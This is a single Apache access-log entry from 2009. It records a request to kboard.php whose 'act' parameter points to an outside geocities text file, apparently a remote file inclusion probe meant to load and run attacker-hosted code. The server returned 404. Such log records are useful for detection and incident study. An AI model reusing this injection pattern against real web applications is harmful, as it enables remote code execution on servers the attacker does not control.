72.82.228.83 - - [16/Jun/2009:00:52:17 -0400] "GET /logs/access_log.Q109060900//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://br.geocities.com/phvr157/ID1.TXT?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
